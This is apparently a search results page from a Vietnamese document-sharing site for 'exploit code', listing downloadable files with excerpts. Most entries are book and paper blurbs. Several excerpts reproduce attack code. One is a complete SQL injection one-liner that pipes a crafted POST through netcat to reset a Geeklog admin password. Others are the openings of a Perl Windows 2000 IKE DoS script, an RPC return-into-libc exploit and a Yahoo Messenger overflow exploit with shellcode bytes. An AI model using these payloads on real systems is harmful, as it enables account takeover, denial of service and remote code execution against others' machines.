Xem 1-20 trên 32 kết quả Exploit code
  • Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.

    pdf2p tt1991tt 20-02-2011 170 64   Download

  • Windows 2000 IKE DoS Exploit Code : 1 lỗ hổng bảo mật lớn trong hệ điều hành Windows 2000 cho phép kẻ tấn công điều khiển từ xa làm tiêu hao dần số lượng CPU time. Sau đây là 1 đoạn Code khai thác lỗi này, dùng để kiểm tra hệ thống của admin : #!/usr/bin/perl -w : use Socket; use Net::RawIP; use Getopt::Std; getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##; print"--- $0 v.

    pdf2p tt1991tt 20-02-2011 70 6   Download

  • Over the last few years, Syngress has published many bestselling and critically acclaimed books, including Tom Shinder’s Configuring ISA Server 2000, Brian Caswell and Jay Beale’s Snort 2.0 Intrusion Detection, and Angela Orebaugh and Gilbert Ramirez’s Ethereal Packet Sniffing. One of the reasons for the success of these books has been our unique solutions@syngress.com program. Through this site, we’ve been able to provide readers a real time extension to the printed book.

    pdf521p vutrung 03-09-2009 198 77   Download

  • Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

    pdf597p vutrung 07-09-2009 152 30   Download

  • An exploitable buffer overflow in unace has been found, the vulnereability will allow local attackers to cause the product to execute abitrary code. The following exploit code can be used to test the software for the vulnerability.

    doc3p ad_uit 08-01-2011 31 5   Download

  • 1 lỗ hổng bảo mật lớn trong hệ điều hành Windows 2000 cho phép kẻ tấn công điều khiển từ xa làm tiêu hao dần số lượng CPU time. Sau đây là 1 đoạn Code khai thác lỗi này, dùng để kiểm tra hệ thống của admin

    doc3p ad_uit 08-01-2011 38 4   Download

  • Rpc Remote Return-into-libc Exploit code khai thác CODE /* * have you recently bought one of those expensive new windows security products * on the market? do you think you now have strong protection? * Look again: * * *rpc!exec* * by ins1der (trixterjack@yahoo.com) * * windows remote return into libc exploit! * * remote rpc exploit breaking non exec memory protection schemes * tested against : * OverflowGuard * StackDefender (kernel32 imagebase randomization:O nice try guys.) * * * currently breaking: * Windows 2000 SP0 (english) * Windows XP SP0 (english) * * to get new offsets use this:...

    pdf9p tt1991tt 20-02-2011 55 2   Download

  • In this work we present a method for Named Entity Recognition (NER). Our method does not rely on complex linguistic resources, and apart from a hand coded system, we do not use any languagedependent tools. The only information we use is automatically extracted from the documents, without human intervention. Moreover, the method performs well even without the use of the hand coded system.

    pdf6p bunbo_1 17-04-2013 10 1   Download

  • The success of an open operating system for smartphones is closely linked to the degree to which the functionality of lower levels of software and hardware can be accessed, modified, and augmented by add-on software and hardware. Java MIDP 1.0 allowed only modest access to underlying Symbian OS functionality. Java MIDP 2.0 exploits it much more fully and this book brings you the most up-to-date information available for programming Java MIDP 2.0 for Symbian OS. As Java MIDP 2.0 smartphones begin to ship in volume in 2004, we are witnessing the coming of a third wave of mobile phones....

    pdf500p tailieuvip13 19-07-2012 31 9   Download

  • Remote Yahoo Messenger V5.5 Exploiter * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--* Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |- */ #include #include #include #include #include /* These are the usual header files */ #include #include #include #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing...

    pdf5p tt1991tt 20-02-2011 44 6   Download

  • Summary A security vulnerability exists in the Messenger Service that could allow arbitrary code execution on an affected system. The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer.

    doc6p vn9h_vnc 26-04-2011 47 4   Download

  • A security vulnerability exists in the Messenger Service that could allow arbitrary code execution on an affected system. The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer.

    doc6p ad_uit 09-01-2011 37 3   Download

  • Tuyển tập báo cáo các nghiên cứu khoa học quốc tế ngành hóa học dành cho các bạn yêu hóa học tham khảo đề tài: Research Article Improved Side Information Generation for Distributed Video Coding by Exploiting Spatial and Temporal Correlations

    pdf15p sting09 21-02-2012 16 2   Download

  • Errors in computer programs are called "bugs". They may be benign and not affect the usefulness of the program, or have only subtle effects. But in some cases they may cause the program or the entire system to "hang" – become unresponsive to input such as mouse clicks or keystrokes – to completely fail, or to crash. Otherwise benign bugs may sometimes be harnessed for malicious intent by an unscrupulous user writing an exploit, code designed to take advantage of a bug and disrupt a computer's proper execution. Bugs are usually not the fault of the computer. Since computers merely...

    pdf51p khangoc2399 21-09-2012 14 1   Download

  • While coding and signal processing are key elements to successful implementation of a MIMO system, the communication channel represents a major component that determines system performance. A considerable volume of work has been performed to characterize communication channels for general wireless applications. However, because MIMO systems operate at an unprecedented level of complexity to exploit the channel space-time resources, a new level of understanding of the channel space-time characteristics is required to assess the potential performance of practical multiantenna links....

    pdf30p khinhkha 20-07-2010 75 42   Download

  • Exploit the power of data-centric and data-driven Android applications with this practical tutorial Master the skills to build data-centric Android applications Go beyond just code by challenging yourself to think about practical use-cases with SQLite and others Focus on flushing out high level design concepts, before drilling down into different code examples In Detail We live in an increasingly data-centric and data-driven world. On top of that we live in a very mobile-centric world with the rise of Android smart phones and tablet devices and the surge in demand for the Android platform....

    pdf212p trasua_123 05-01-2013 59 24   Download

  • With LINQ, you can query data from a variety of sources — including databases, objects, and XML files — directly from Microsoft Visual Basic® or C#. Guided by data-access experts who’ve worked in depth with LINQ and the Microsoft development teams, you’ll learn how .NET Framework 4 implements LINQ, and how to exploit it. Clear examples show you how to deliver your own data-access solutions faster and with leaner code. Discover how to: Use LINQ to query databases, object collections, arrays, XML, Microsoft Excel® files, and other sources...

    pdf705p stingdau_123 26-01-2013 46 16   Download

  • Software security is gaining momentum as security professionals realize that computer security is really all about making software behave. The publication of Building Secure Software in 2001 (Viega and McGraw) unleashed a number of related books that have crystallized software security as a critical field. Already, security professionals, software developers, and business leaders are resonating with the message and asking for more.

    pdf597p vinhnghi 26-08-2009 88 12   Download

  • Password sniffing, spoofing, buffer overflows, and denial of service: these are only a few of the attacks on today's computer systems and networks. At the root of this epidemic is poorly written, poorly tested, and insecure code that puts everyone at risk. Clearly, today's developers need help figuring out how to write code that attackers won't be able to exploit. But writing such code is surprisingly difficult.

    pdf792p titatu_123 01-03-2013 23 12   Download

  • The characteristics of a speech signal that are exploited for various applications of speech signal processing to be discussed later in this section on speech processing (e.g., coding, recognition, etc.) arise from the properties and constraints of the human vocal apparatus. It is, therefore, useful in the design of such applications to have some familiarity with the process of speech generation by humans.

    pdf22p longmontran 18-01-2010 57 9   Download

Đồng bộ tài khoản